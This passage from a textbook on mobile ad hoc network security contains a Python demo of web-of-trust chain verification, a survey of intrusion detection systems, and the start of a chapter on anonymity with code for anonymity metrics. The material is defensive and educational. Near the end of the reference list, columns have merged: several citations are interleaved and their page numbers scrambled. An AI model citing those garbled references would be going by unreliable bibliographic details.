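def demo() -> dict:
    """Constructed web of trust: A trusts its own key; A certified B; B certified C."""
    (a_pub, a_priv), (b_pub, b_priv), (c_pub, _), (m_pub, _) = (keypair(i) for i in range(4))
    cert_ab = make_cert("A", a_priv, "B", b_pub)
    cert_bc = make_cert("B", b_priv, "C", c_pub)
    swapped = dict(cert_bc, pub=m_pub)       # attacker M substitutes its key for C's
    return {
        "c_pub": c_pub,
        "valid": verify_chain("A", a_pub, [cert_ab, cert_bc], "C"),
        "key_swapped": verify_chain("A", a_pub, [cert_ab, swapped], "C"),
        "wrong_order": verify_chain("A", a_pub, [cert_bc, cert_ab], "C"),
        "incomplete": verify_chain("A", a_pub, [cert_ab], "C"),
    }
```

`demo()["valid"]` is C's public key; the three other chains (a substituted key, a chain whose first link is not issued by the trusted name, and a chain that stops at B) all return None. Note that, as the text says, A has used only what it stores locally: its own key and the two certificates it collected.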


Intrusion Detection Systems (IDS) for MANETs

In the traditional Internet, network devices such as routers, switches, and gateways can be used to monitor traffic. Due to the lack of such devices and of a fixed infrastructure, intrusion detection in MANETs is more challenging than in the Internet. Moreover, the restriction on resources makes data analysis, which usually plays an important role in intrusion detection, more difficult. A comprehensive survey on IDS for MANETs can be found in Avantvalee and Wu (2006).

An IDS for MANETs not only has the same requirements as in wired networks (such as reliability, minimal false positive and false negative rates, transparency to system and users, etc.), but must also make low use of system and network resources. Therefore, the design and development of an IDS for MANETs is not a trivial task.

A simple solution for IDS in MANETs is that each host relies on itself for detection: the audit data are gathered and processed locally. Some IDS proposed for MANETs let individual nodes determine intrusions independently when the local evidence is strong. But many systems also allow a node to request complementary information from others, so that cooperation is reinforced when the local evidence is weak or inconclusive.

Albers, Camp, Percher, Jouga, Me, and Puttini (2002) propose a local IDS (LIDS), which uses several mobile agents on each node. All the LIDS in a community can collaborate to alert each other of intrusions. These data are independent of the operating system and need no additional resources for local information. A LIDS has several data-collecting agents of different types: a local agent that locally detects and responds to intrusions; a collection of mobile agents that collect and process data from remote hosts; and a local MIB agent that collects MIB (management information base) variables for the mobile agents or the local LIDS agent. The authors claim to have implemented prototypes, but no results are demonstrated in the publication.

A distributed intrusion detection model was later proposed by Zhang, Lee, and Huang (2003). The IDS agent is composed of six modules: a local data collection module that collects real-time audit data; a local detection engine that performs local anomaly detection; a cooperative detection engine that supports collaboration and collects broader data sets from other agents; a local response module that triggers local response actions; a global response module that coordinates responses among neighboring nodes; and a secure communication module that provides secure communication channels among IDS agents. For the anomaly detection model, two classification techniques, RIPPER (repeated incremental pruning to produce error reduction) and SVM (support vector machine) Light, are applied to compute classifiers that serve as anomaly detectors. The classifiers are used to detect anomalous updates to routing tables. The performance of the alternatives is evaluated and compared through simulations; the authors find that protocols with strong traffic correlation have better detection performance.

Kachirski and Guha (2003) propose an agent-based IDS that uses multiple mobile sensors to determine intrusions. The system assigns functional tasks to different agents: a network monitoring agent that monitors network packets (only on certain nodes, to preserve resources); a host monitoring agent on every node that monitors system- and application-level activities; a decision-making agent on every node that determines intrusions based on host-level information, and on certain nodes network-level intrusions as well; and an action agent on every node that responds to intrusions. Like the two IDS described above, this system makes intrusion decisions based on both independent and collaborative monitoring, and the level of monitoring can be adapted to the available computational and network resources.

Another intrusion detection technique is the dynamic hierarchical intrusion detection architecture proposed by Sterne, Balasubramanyam, Carman, Wilson, Talpade, Ko et al. (2005). The system requires every node to monitor, log, analyze, and respond to detected intrusions. It also uses clustering to form a hierarchical structure. Different nodes (e.g., leaf nodes and clusterhead nodes in the structure) may perform different functions in intrusion detection. This hierarchical structure is advantageous in monitoring end-to-end traffic and thus can help detect end-to-end attacks. The system does not use promiscuous listening, which is arguably unrealistic for MANETs. However, some researchers have also argued that a hierarchical architecture may not be suitable for MANETs either, due to the rapid topology changes of MANETs and the high overhead introduced by organizing the hierarchy.
Sun, Wu, and Pooch (2003) propose a zone-based IDS (ZBIDS). ZBIDS divides the network into nonoverlapping zones. Nodes are categorized into two types based on their location relative to a zone: intrazone nodes (within a zone and not connected to nodes in another zone) and interzone nodes (within a zone and connected to nodes in another zone). Intrazone nodes are responsible for local detection and broadcast alerts when they detect something. Interzone nodes aggregate and correlate these local detection results. The system can confine detection cooperation to a zone, which may reduce the overhead of broadcast and aggregation. However, the system requires that each node know its physical location, which needs prior setup. The management of zones is not a trivial task either.

Intrusion detection has been a challenging task for MANETs, mainly due to the distributed nature and resource constraints of ad hoc networks. Determining intrusions with local or incomplete information and with low overhead has been a major concern for researchers.

OPEN CHALLENGES AND CONCLUSION

Challenges

Research in MANET security is still in its early stage. Some areas that are interesting but little explored include accounting, trust management, authentication, and key management.

Accounting provides the means for collecting the information used for billing, auditing, and reporting. Accounting mechanisms can track the services that users are accessing as well as the amount of network resources they are consuming. Accounting is a challenging problem due to the distributed and ephemeral nature of MANETs.

The characteristics of MANETs also make trust management difficult. In MANETs, trustworthiness is evaluated based on the information or evidence provided by peers, not by trusted authorities or a central administration point (as in the Internet or in wireless networks with base stations). Additionally, gathering trust evidence may be difficult because of the small bandwidth, so local information has to be relied on. Evaluation with uncertain and incomplete trust evidence certainly poses challenges to trust management.

Research progress has been made on authentication and key management. But finding cryptographic mechanisms that consume fewer computational resources and impose lower time complexity is still a major research concern in MANET security.

Another problem for MANET security is to find an effective and efficient approach to intrusion response. Many publications simply mention that proper actions should be taken to react to intrusions, which may include alarming the other nodes in the network, isolating the compromised nodes, or re-establishing the trust relationships for the entire network. But the problem of how to locate and then isolate the compromised nodes is not discussed in detail. Locating and isolating them could be even more difficult when distributed attacks are launched from multiple sources. Eliminating the compromised nodes by rekeying or rebuilding trust could be an effective solution; however, it is certainly not efficient once the computation and communication overhead it may cause is taken into account.

Some other unexplored research problems include the tradeoff between privacy (such as identity anonymity and location privacy) and other security services (such as accounting and intrusion detection), and the tradeoff between security strength and network performance.

Yang et al. (2004) argue that MANET security needs a "multifence security solution," namely a resiliency-oriented security design. They argue that the existing proposals are attack-oriented because each protocol targets some specific attack that has been identified first; these protocols therefore may not work well in the presence of unanticipated attacks. They propose that a security solution is needed that can be embedded into every component or every layer in the network. Such a solution can offer multiple lines of defense against both known and unknown security threats.
Besides the problems described above, how to adapt security mechanisms to a large-scale wireless network is also an interesting problem. The scalability of security mechanisms and the compromise between security and network scalability are certainly topics worth further study.

Conclusion

With the rapid proliferation of wireless networks and mobile computing applications, MANETs have received increased attention. Security is an important feature for ad hoc networks, especially in untrustworthy environments such as battlefields. Development of security solutions for ad hoc networks has therefore become a major research concern.

However, the characteristics of ad hoc networks have not only introduced vulnerabilities to malicious attacks ranging from passive eavesdropping to active interference, but also imposed difficulties and challenges on introducing security features into MANETs.

This book chapter has discussed the security vulnerabilities, challenges, and security solutions for MANETs. A variety of attacks and their countermeasures have been identified for different network operations, mechanisms, and network layers. Existing research efforts as well as the open challenges were discussed in the chapter.

REFERENCES

Aad, I., Hubaux, J.-P., & Knightly, E.W. (2004). Denial of service resilience in ad hoc networks. In Proceedings of the ACM International Conference on Mobile Computing and Networking (MobiCom 2004), Philadelphia, (pp. 202-215).

Albers, P., Camp, O., Percher, J., Jouga, B., Me, L., & Puttini, R. (2002). Security in ad hoc networks: A general intrusion detection architecture enhancing trust based approaches. In Proceedings of the 1st International Workshop on Wireless Information Systems (WIS-2002) (pp. 1-12).

Anderegg, L., & Eidenbenz, S. (2003). Routing and forwarding: Ad hoc-VCG: A truthful and cost-efficient routing protocol for mobile ad hoc networks with selfish agents. In Proceedings of the 9th Annual International Conference on Mobile Computing and Networking (MobiCom '03), San Diego, (pp. 245-259). ACM Press.

Avantvalee, T., & Wu, J. (2006). A survey on intrusion detection in mobile ad hoc networks. In Y. Xiao, X. Shen, & D.-Z. Du (Eds.), Wireless/mobile network security (pp. 170-196).

Balfanz, D., Smetters, D.K., Stewart, P., & Wong, H.C. (2002). Talking to strangers: Authentication in ad-hoc wireless networks. Paper presented at the Symposium on Network and Distributed Systems Security (NDSS '02), San Diego.

Buchegger, S., & Boudec, J.L. (2001). The selfish node: Increasing routing security in mobile ad hoc networks (IBM Research Report: RR 3354).

Buchegger, S., & Boudec, J.L. (2002a). Nodes bearing grudges: Towards routing security, fairness, and robustness in mobile ad hoc networks. In Proceedings of the Tenth Euromicro Workshop on Parallel, Distributed and Network-based Processing, Canary Islands, Spain, (pp. 403-410). IEEE Computer Society.

Buchegger, S., & Boudec, J.L. (2002b). Performance analysis of the CONFIDANT protocol: Cooperation of nodes - fairness in dynamic ad-hoc networks. In Proceedings of the IEEE/ACM Symposium on Mobile Ad Hoc Networking and Computing (MobiHoc), Lausanne, CH, (pp. 226-236). ACM Press.

Buttyán, L., & Hubaux, J.-P. (2000). Enforcing service availability in mobile ad-hoc WANs. In Proceedings of the Workshop on Mobile Ad-hoc Networking and Computing (MobiHOC), Boston, (pp. 87-96).

Buttyán, L., & Hubaux, J.-P. (2003). Stimulating cooperation in self-organizing mobile ad hoc networks. Mobile Networks and Applications, 8(5), 579-592.


Cagalj, M., Ganeriwal, S., Aad, I., & Hubaux, J.-P. (2004). On cheating in CSMA/CA ad hoc networks (Tech. Rep. IC/2004/27, EPFL-DI-ICA). Lausanne, Switzerland: Swiss Federal Institute of Technology Lausanne.

Capkun, S., Buttyan, L., & Hubaux, J.-P. (2003). Self-organized public-key management for mobile ad hoc networks. IEEE Transactions on Mobile Computing, 2(1), 52-64.

Chan, A.C.-F. (2004). Distributed symmetric key management for mobile ad hoc networks. In Proceedings of the 23rd Annual Joint Conference of the IEEE Computer and Communications Societies (INFOCOM), Hong Kong, China, (pp. 2414-2424). IEEE.

Crepeau, C., & Davis, C.R. (2003). A certificate revocation scheme for wireless ad hoc networks. In Proceedings of the 1st ACM Workshop on Security of Ad Hoc and Sensor Networks, Fairfax, Virginia, (pp. 54-61). ACM Press.

Gupta, V., Krishnamurthy, S., & Faloutsos, M. (2002). Denial of service attacks at the MAC layer in wireless ad hoc networks. In Proceedings of MILCOM.

Hu, Y.C., Johnson, D., & Perrig, A. (2002). SEAD: Secure efficient distance vector routing for mobile wireless ad hoc networks. In Proceedings of the 4th IEEE Workshop on Mobile Computing Systems and Applications (WMCSA '02), Callicoon, New York, (pp. 3-13).

Hu, Y.C., Perrig, A., & Johnson, D. (2002). Ariadne: A secure on-demand routing protocol for ad hoc networks. In Proceedings of the 8th ACM International Conference on Mobile Computing and Networking (MobiCom), Atlanta, Georgia, (pp. 12-23). ACM Press.

Hu, Y.C., Perrig, A., & Johnson, D. (2003a). Packet leashes: A defense against wormhole attacks in wireless ad hoc networks. In Proceedings of the Twenty-Second Annual Joint Conference of the IEEE Computer and Communications Societies (INFOCOM 2003) (pp. 1976-1986). IEEE.

Hu, Y.C., Perrig, A., & Johnson, D. (2003b). Rushing attacks and defense in wireless ad hoc network routing protocols. In Proceedings of ACM WiSe 2003, San Diego, (pp. 30-40). ACM Press.

IEEE. (1999). Standard for wireless LAN-medium access control and physical layer specification, P802.11.

Jha, S., Tan, K., & Maxion, R. (2001). Markov chains, classifiers, and intrusion detection. In Proceedings of the 14th IEEE Computer Security Foundations Workshop, Cape Breton, Nova Scotia, Canada, (pp. 206-219).

Johnson, D.B., Maltz, D.A., & Hu, Y. (2004). The dynamic source routing protocol for mobile ad hoc networks (DSR). Internet Draft, MANET working group. Retrieved November 17th, 2006, from http://www.ietf.org/internet-drafts/draft-ietf-manet-dsr-10.txt

Jones, A. (2000). Game theory: Mathematical models of conflict (pp. 210-236). Horwood Publishing.

Kachirski, O., & Guha, R. (2003). Effective intrusion detection using multiple sensors in wireless ad hoc networks. In Proceedings of the 36th Annual Hawaii International Conference on System Sciences (HICSS '03) (pp. 57.1-57.8). IEEE.

Kong, J., Zerfos, P., Luo, H., Lu, S., & Zhang, L. (2001). Providing robust and ubiquitous security support for mobile ad hoc networks. In Proceedings of the 9th International Conference on Network Protocols (ICNP) (pp. 251-260). ACM Press.

Konorski, J. (2001). Protection of fairness for multimedia traffic streams in a non-cooperative wireless LAN setting. Paper presented at PROMS (LNCS 2213, pp. 116-129). Springer.

Konorski, J. (2002). Multiple access in ad-hoc wireless LANs with noncooperative stations. Networking (LNCS 2345, pp. 1141-1146). Springer.

Kyasanur, P., & Vaidya, N.H. (2005). Selfish MAC layer misbehavior in wireless networks. IEEE Transactions on Mobile Computing, 4(5), 502-516.


Lu, B., & Pooch, U.W. (2005). A lightweight authentication protocol for mobile ad hoc networks. In Proceedings of the International Conference on Information Technology: Coding and Computing (ITCC '05), Las Vegas, (pp. 546-551). ACM Press.

Mackenzie, A.B., & Wicker, S.B. (2000). Game theory and the design of self-configuring, adaptive wireless networks. IEEE Communications Magazine, 39(11), 126-131.

Mackenzie, A.B., & Wicker, S.B. (2003). Stability of multipacket slotted Aloha with selfish users and perfect information. In Proceedings of Infocom 2003, San Francisco, (pp. 1583-1590). IEEE.

Macker, J., & Chakeres, I. (2006). Mobile ad-hoc networks (MANET). Retrieved November 17th, 2006, from http://www.ietf.org/html.charters/manet-charter.html

Marti, S., Giuli, T., Lai, K., & Baker, M. (2000). Mitigating routing misbehavior in mobile ad hoc networks. In Proceedings of the 6th ACM International Conference on Mobile Computing and Networking (MobiCom 2000), Boston, MA, (pp. 255-265). ACM Press.

Michiardi, P., & Molva, R. (2002a). CORE: A collaborative reputation mechanism to enforce node cooperation in mobile ad hoc networks. Paper presented at the Sixth IFIP Conference on Security, Communications, and Multimedia (CMS 2002), Portoroz, Slovenia.

Michiardi, P., & Molva, R. (2002b). Game theoretic analysis of security in mobile ad hoc networks (Tech. Rep. RR-02-070). Institut Eurecom.

Mohan, M., & Joiner, L.L. (2004). Solving billing issues in ad hoc networks. In Proceedings of ACMSE '04, Huntsville, AL, (pp. 31-36). ACM Press.

Nash, J. (1950). The bargaining problem. Econometrica, 18, 155-162. The Econometric Society.

Papadimitratos, P., & Haas, Z.J. (2002). Secure routing for mobile ad hoc networks. Paper presented at the SCS Communication Networks and Distributed Systems Modeling and Simulation Conference (CNDS 2002), San Antonio, TX.

Perkins, C.E. (Ed.). (2001). Ad hoc networks. Upper Saddle River, NJ: Addison-Wesley.

Perkins, C.E., Belding-Royer, E.M., & Das, S.R. (2003). Ad hoc on-demand distance vector (AODV) routing. Internet Request for Comments RFC 3561. Retrieved November 17th, 2006, from http://www.ietf.org/rfc/rfc3561.txt

Perkins, C.E., & Bhagwat, P. (1994). Highly dynamic destination-sequenced distance-vector routing (DSDV) for mobile computers. Paper presented at the ACM Conference on Communications Architectures, Protocols and Applications (SIGCOMM '94), London, (pp. 234-244). ACM Press.

Perrig, A., Canetti, R., Song, D., & Tygar, D. (2001). Efficient and secure source authentication for multicast. In Proceedings of the Network and Distributed System Security Symposium (NDSS '01), San Diego, CA, (pp. 35-46).

Perrig, A., Canetti, R., Tygar, D., & Song, D. (2000). Efficient authentication and signing of multicast streams over lossy channels. In Proceedings of the IEEE Symposium on Security and Privacy, Berkeley, CA, (pp. 56-73). IEEE.

Perrig, A., Canetti, R., Tygar, D., & Song, D. (2002, Summer). The TESLA broadcast authentication protocol. RSA CryptoBytes, 5, 2-13.

Radosavac, S., Baras, J.S., & Koutsopoulos, I. (2005). A framework for MAC protocol misbehavior detection in wireless networks. Paper presented at the Wireless Security Workshop (WiSe '05), Cologne, Germany, (pp. 33-42).

Radosavac, S., Cardenas, A., Baras, J.S., & Moustakides, G. (2006). Detecting IEEE 802.11 MAC layer misbehavior in ad hoc networks: Robust strategies against individual and colluding attackers. Journal of Computer Security: Special Issue on Security of Ad Hoc and Sensor Networks, 15 (2007), 103-128.

Raya, M., Hubaux, J.-P., & Aad, I. (2004). DOMINO: A system to detect greedy behavior in IEEE 802.11 hotspots. In Proceedings of the Second International Conference on Mobile Systems, Applications, and Services (MobiSys '04), Boston, MA, (pp. 84-97).
Rivest, R.L., Adleman, L., & Dertouzos, M.L. (1978). On data banks and privacy homomorphisms. In Foundations of secure computation (pp. 169-179). Academic Press.

Salem, N.B., Buttyan, L., Hubaux, J.-P., & Jakobsson, M. (2003). A charging and rewarding scheme for packet forwarding in multi-hop cellular networks. In Proceedings of MobiHoc '03, Annapolis, MD, (pp. 13-24). ACM Press.

Sanzgiri, K., Dahill, B., Levine, B.N., Shields, C., & Royer, E.M. (2002). A secure routing protocol for ad hoc networks. In Proceedings of the 10th IEEE International Conference on Network Protocols (ICNP '02), Paris, (pp. 78-87). IEEE.

Song, N., Qian, L., & Li, X. (2005). Wormhole attacks detection in wireless ad hoc networks: A statistical analysis approach. In Proceedings of the 19th IEEE International Parallel and Distributed Processing Symposium (IPDPS '05), Denver, CO, (pp. 289-296).

Srinivasan, V., Nuggehalli, P., Chiasserini, C.F., & Rao, R.R. (2003). Cooperation in wireless ad hoc networks. In Proceedings of IEEE INFOCOM, San Francisco, (pp. 808-817).

Stajano, F., & Anderson, R.J. (1999). The resurrecting duckling: Security issues for ad-hoc wireless networks. In B. Christianson, B. Crispo, & M. Roe (Eds.), Security Protocols, 7th International Workshop Proceedings (LNCS, vol. 1796, pp.

(WiSe '03) in conjunction with the 9th Annual International Conference on Mobile Computing and Networking (MobiCom '03), San Diego, (pp. 69-78). ACM Press.

Venkatraman, L., & Agrawal, D. (2000). A novel authentication scheme for ad hoc networks. Paper presented at the IEEE Wireless Communications and Networking Conference (WCNC 2000), Chicago, IL, (Vol. 3, pp. 1268-1273). IEEE.

Weimerskirch, A., & Thonet, G. (2001). A distributed light-weight authentication model for ad-hoc networks. In Proceedings of the 4th International Conference on Information Security and Cryptology (ICISC 2001), Seoul, Korea, (pp. 341-354). ACM Press.

Xu, W., Trappe, W., Zhang, Y., & Wood, T. (2005). The feasibility of launching and detecting jamming attacks in wireless networks. In Proceedings of the Sixth ACM International Symposium on Mobile Ad Hoc Networking and Computing (MobiHoc '05), Urbana Champaign, IL, (pp. 48-57). ACM Press.

Yang, H., Luo, H., Ye, F., Lu, S., & Zhang, L. (2004). Security in mobile ad hoc networks: Challenges and solutions. IEEE Wireless Communications, 11(1), 38-47.

Zapata, M.G. (2006). Secure ad hoc on-demand distance vector (SAODV) routing. Internet Draft, MANET working group. Retrieved December 12th, 2006, from http://www.ietf.org/internet-drafts/draft-guerrero-manet-saodv-06.txt

Zhang, Y., Lee, W., & Huang, Y. (2003). Intrusion detection techniques for mobile wireless networks. Wireless Networks Journal (ACM WINET)
(5),, 9
172-194). 545-556. ACM/Kluwer Press.
Sterne, D., Balasubramanyam, P., Carman, D., Zhong, S., Chen, J., & Yang, Y.R. (2003). Sprite: A
Wilson, B., Talpade, R., Ko, C., et al. (2005). A simple, cheat-proof, credit-based system for mobile
general cooperative intrusion detection architec- ad-hoc networks. In Proceedings of IEEE Infocom,
ture for MANETs. In Proceedings of the 3rd IEEE San Francisco, (pp. 1987-1997). IEEE.
International Workshop on Information Assurance
Zhou, L., & Haas, Z. (1999). Securing ad hoc
(IWIA, ) 50‘ Oahu, HI, (pp. 57-70).
networks. IEEENetwork,6 (13), 24-30.
Sun, B., Wu, K., & Pooch, U.W. (2003). Alert aggre-
Zhu, S., Xu, S., Setia, S., & Jajodia, S. (2003).
gation in mobile ad hoc networks. In Proceedings
LHAP: A lightweight hop-by-hop authentication
of the 2003 ACM Workshop on Wireless Security


Security in Mobile Ad Hoc Networks

Key Terms

Authentication: The process of verifying the identity of an entity, that is, whether it is indeed the entity it declares to be.

Intrusion Detection: The techniques or processes of detecting inappropriate, incorrect, or anomalous activities.

Key Management: The techniques or processes of creating, distributing, and maintaining a secret key, which will be used to protect the secrecy of communications or to ensure the original data are not maliciously altered.

MANET (mobile ad hoc network): An infrastructure-less, self-organizing network of mobile hosts connected with wireless communication channels. A MANET does not have a fixed topology because all the hosts can move freely, which results in rapid and unpredictable topology change.

Medium Access Control (MAC): A sublayer of the data link layer specified in the seven-layer OSI (open systems interconnection) model. It addresses problems of moving data frames across a shared channel.

Routing: The process of selecting paths in a network along which to send data packets.

Security: The concepts, measures, or processes of protecting data from unauthorized access or disruption.

End Note

1. Signal jamming can also be launched at the physical layer, but it is not within the scope of this chapter because it is more related to electrical engineering than computer security.


Chapter XXVII
Privacy and Anonymity in
Mobile Ad Hoc Networks
Christer Andersson
Combitech, Sweden

Leonardo A. Martucci
Karlstad University, Sweden

Simone Fischer-Hübner
Karlstad University, Sweden

Abstract

Providing privacy is often considered a keystone factor for the ultimate take up and success of mobile ad
hoc networking. Privacy can best be protected by enabling anonymous communication and, therefore,
this chapter surveys existing anonymous communication mechanisms for mobile ad hoc networks. On
the basis of the survey, we conclude that many open research challenges remain regarding anonymity
provisioning in mobile ad hoc networks. Finally, we also discuss the notorious Sybil attack in the context
of anonymous communication and mobile ad hoc networks.

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.

Introduction

The quest for privacy in today's increasingly pervasive information society remains a fundamental research challenge. In the traditional (wired) Internet, one essential means for protecting privacy is anonymous communication. Being anonymous usually implies that a user remains unlinkable to a set of items of interest (e.g., communication partners, messages) from an attacker's perspective (Pfitzmann & Hansen, 2006). The capabilities of the attacker are usually modeled by an attacker model, which can, for instance, include a rogue communication partner or an observer tapping the communication lines. Further, more advanced applications can be deployed on top of anonymous
communication mechanisms, to, for instance, enable pseudonymous applications.

This chapter investigates how anonymous communication can be enabled in mobile ad hoc networks (Corson & Macker, 1999): networks constituted by mobile platforms that establish on-the-fly wireless connections among themselves and form ephemeral networks without central entities to control them. They are of great importance as they constitute a basic core functionality needed for deploying ubiquitous computing. In short, ubiquitous computing would allow for computational environments providing information instantaneously through "invisible interfaces," thus allowing unlimited spreading and sharing of information. If realized, ubiquitous computing could offer invaluable support for many aspects of our society and its institutions. However, if privacy aspects are neglected, there is a great likelihood that the end product will resemble an Orwellian nightmare.

In this chapter, we study how privacy and anonymity issues are tackled today in mobile ad hoc networks by surveying existing anonymous communication mechanisms adapted for mobile ad hoc networks[1]. Only recently, a number of such proposals have been suggested. In the survey, we evaluate some of these approaches against a set of general requirements (Andersson, Martucci, & Fischer-Hübner, 2005), which assess to which degree these approaches are suitable for mobile ad hoc networks. We also discuss Sybil attacks (Douceur, 2002) in the context of anonymous communication and mobile ad hoc networks.

This chapter is structured as follows. First, an introduction to privacy, anonymity, and anonymity metrics is provided in "Background." Then, existing approaches for enabling anonymity in ad hoc networks are described in "Anonymous Communication in Mobile Ad Hoc Networks." In "Survey of Anonymous Communication Mechanisms for Ad Hoc Networks" these approaches are evaluated against the aforementioned requirements. Then, Sybil attacks in the context of anonymous communication and mobile ad hoc networks are discussed in "Future Trends." Finally, conclusions are drawn in "Conclusions."

Background

In this section, the concepts of privacy and anonymity and their relation are introduced. Methods for quantifying anonymity are also discussed.

Definitions of Anonymity and Related Concepts

Pfitzmann and Hansen (2006) define anonymity as "the state of being not identifiable within a set of subjects, the anonymity set" (p. 6). The anonymity set includes all possible subjects in a given scenario, such as possible senders of a message.

Related to anonymity is unlinkability, where unlinkability of two or more items of interest (IOIs, e.g., subjects, messages, events, actions, etc.) means that within the system (comprising these and possibly other items), from the attacker's perspective, these items of interest are no more and no less related after his observation than they are related concerning his a-priori knowledge (Pfitzmann & Hansen, 2006, p. 8).

Figure 1. Unlinkability between a user in the anonymity set and an item of interest (figure labels only: Anonymity set, Communication network, Messages)

Figure 2. Setting a path between A and D (through B and C) using layered encryption; PKB and PKC are the public keys of B and C. KAB and KAC are shared symmetric keys. D is an external receiver.
A → B: EPKB{C, KAB, EPKC{D, KAC}}
B → C: EPKC{D, KAC}
C learns D
A → B → C → D

Anonymity can be defined in terms of unlinkability: sender anonymity entails that a message cannot be linked to the sender, while receiver anonymity implies that a message cannot be linked to the receiver (see Figure 1).

In traditional networks, such as the Internet, anonymous communication is often realized by anonymous overlay networks, which establish virtual paths consisting of one or more intermediary nodes, along which packets are transmitted. Using methods described below, the anonymous overlay network constructs the paths in such a manner that the correlation between the sender and receiver, and possibly also the identity of the sender and/or the receiver, is hidden.

A classic method enabling anonymity, where the sender determines the full path, is layered encryption[2]: a message is wrapped into several encryption layers. As the message propagates through the network, these layers are sequentially decrypted by each successive node in the path, until the receiver decrypts the final layer. Each layer usually includes the identity of the next node in the path and a symmetric key shared with the initiating node (see Figure 2). In this way, expensive public key encryption is only used for constructing the path; for data delivery, symmetric encryption is used. Messages encrypted in layers are often denoted message onions. Layered encryption enables anonymity as intermediary nodes do not know whether their predecessor and successor nodes are the sender or receiver, respectively.

An alternative approach, first applied in Crowds (Reiter & Rubin, 1997), is to let the sender select its successor randomly, which in turn flips a biased coin to decide whether it should end the path and connect to the receiver, or extend the path to a random node. The flipping of the biased coin is repeated until a node decides to connect to the receiver (see Figure 3). In this approach, link-to-link encryption between intermediary hops in the path is usually combined with end-to-end encryption. This approach enables sender anonymity towards network nodes and the receiver, as neither of these nodes can deduce if the previous node in the path is the sender.

Another method specifically tailored for providing receiver anonymity is invisible implicit addressing (Pfitzmann & Waidner, 1987). Invisible implicit addressing hides the identity of the receiver by first encrypting a message (or a part of it) with


Figure 3. "Crowds-like" path setting between the sender and receiver (figure not reproduced)

the receiver's public key (or a shared symmetric key). Instead of sending the message directly to the receiver, the message is then broadcast to all nodes in the network, which all must try to decrypt the message. However, only the intended receiver will be able to successfully decrypt the message.

On the Relation between Privacy and Anonymity

Privacy is recognized either explicitly or implicitly as a fundamental human right by most constitutions of democratic societies. Privacy can be defined as the right to informational self-determination, that is, individuals must be able to determine for themselves when, how, to what extent, and for what purpose personal information about them is communicated to others.

In Europe, the right to privacy of individuals is protected by a legal framework mainly consisting of the EU Data Protection Directive 95/46/EC, which defines general privacy requirements, and the E-Communications Privacy Directive 2002/58/EC, which specifically applies to personal data processing within the electronic communication sector.

An important privacy principle is data minimization, stating that the collection and processing of personal data should be minimized. Clearly, the less personal data are collected or processed, the less the right to informational self-determination is affected. Art. 6 (1) of the EU Data Protection Directive 95/46/EC embodies the principle of data minimization by stating that personal data should be limited to data that are adequate, relevant, and not excessive, and by requiring that data should only be kept in a form that permits identification of data subjects for no longer than is necessary for the purpose for which the data were collected or for which they are further processed. Consequently, technical tools such as privacy-enhancing technologies should be available to contribute to the effective implementation of these requirements by providing anonymity and/or pseudonymity for the users and other concerned individuals.

More specific legal requirements for anonymization can also be found in the E-Communications Privacy Directive 2002/58/EC. Pursuant to Art. 9 of the Directive, location data may only be processed when they are made anonymous, or with the consent of the user or subscriber to the extent and for the duration necessary for the provision of a value-added service.

Measuring Anonymity

This section discusses anonymity metrics, which quantify the degree of anonymity in a given scenario in the following manner. First, the given attacker model, together with the properties of the anonymous communication mechanism, are passed


Table 1. A summary of anonymity metrics

Anonymity set size: A classic indicator of anonymity is the size of the anonymity set. This metric is appropriate for mechanisms in which all users are equally likely to be the sender of a particular message, as in the DC-networks (Chaum, 1988) or Crowds, regarding the Web server (Reiter & Rubin, 1997).

K-anonymity: If a mechanism provides k-anonymity (Sweeney, 2002), k constitutes a lower bound of the anonymity set size n. For example, k = 3 implies that an attacker cannot exclude more than (n − 3) users from the anonymity set.

Crowds-based metric: In the Crowds-based metric[3] (Reiter & Rubin, 1997), anonymity is measured on a continuum, including the points possible innocence (the probability that a user is not the sender is not negligible), probable innocence (the probability that a user is the sender is ≤ 1/2), and beyond suspicion (the user is not more likely than any other user to be the sender). The analysis is based on the communication patterns in Crowds, and the result is a probability depending on the anonymity set size and the number of corrupted users.

Entropy-based metrics: In entropy-based metrics (Diaz, Seys, Claessens, & Preneel, 2002; Serjantov & Danezis, 2002), each user is first assigned a probability of being the sender of a message. The entropy regarding which user sent the message is then calculated using Shannon's theories (Shannon, 1948). The resulting degree is system-wide and may change depending on, for example, changes in the attacker's knowledge. Diaz et al. solely base their analysis on the probability distributions (equally distributed probabilities ⇒ maximum degree of anonymity), while in Serjantov and Danezis' metric, a large anonymity set contributes positively to the degree of anonymity.

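As an added worked example (not from the chapter), the following Python code evaluates the metrics of Table 1 on constructed inputs. The Crowds probability is the closed form from Reiter & Rubin (1997) for the chance that the honest node directly preceding the first corrupted node on a path is the true sender, which the table only describes qualitatively; the entropy functions implement the Diaz et al. ratio and the Serjantov and Danezis effective set size side by side so that the difference the table mentions is visible.

```python
"""Anonymity metrics of Table 1, worked in code (added example, not the
chapter's own material; all numeric scenarios below are constructed)."""
import math


def crowds_sender_probability(n: int, c: int, p_f: float) -> float:
    """Crowds-based metric (Reiter & Rubin, 1997): probability that the node
    directly preceding the first corrupted jondo is the real sender, given
    that at least one corrupted jondo is on the path.
    n = anonymity set size (corrupted jondos included), c = corrupted jondos,
    p_f = probability of forwarding (the bias of the coin)."""
    if not (0 <= c < n) or not (0 < p_f < 1):
        raise ValueError("need 0 <= c < n and 0 < p_f < 1")
    return 1.0 - p_f * (n - c - 1) / n


def crowds_innocence_level(n: int, c: int, p_f: float) -> str:
    """Place the probability on the continuum of Table 1."""
    p = crowds_sender_probability(n, c, p_f)
    if p <= 1.0 / n:            # no more likely than any other user
        return "beyond suspicion"
    if p <= 0.5:                # P(sender) <= 1/2
        return "probable innocence"
    return "possible innocence"  # still not certain, but worse than even


def min_crowd_size(c: int, p_f: float) -> int:
    """Smallest n giving probable innocence: n >= p_f / (p_f - 1/2) * (c + 1)."""
    if p_f <= 0.5:
        raise ValueError("probable innocence needs p_f > 1/2")
    return math.ceil(p_f / (p_f - 0.5) * (c + 1))


def entropy_bits(probs) -> float:
    """Shannon entropy H(X), in bits, of 'which user is the sender'."""
    if any(p < 0 for p in probs) or abs(sum(probs) - 1.0) > 1e-9:
        raise ValueError("probabilities must be non-negative and sum to 1")
    return -sum(p * math.log2(p) for p in probs if p > 0)


def degree_of_anonymity(probs) -> float:
    """Diaz et al.: d = H(X) / H_max with H_max = log2(N). Only the shape of
    the distribution matters; a uniform distribution scores 1.0 whatever N is."""
    n = len(probs)
    if n < 2:
        return 0.0
    return entropy_bits(probs) / math.log2(n)


def effective_anonymity_set_size(probs) -> float:
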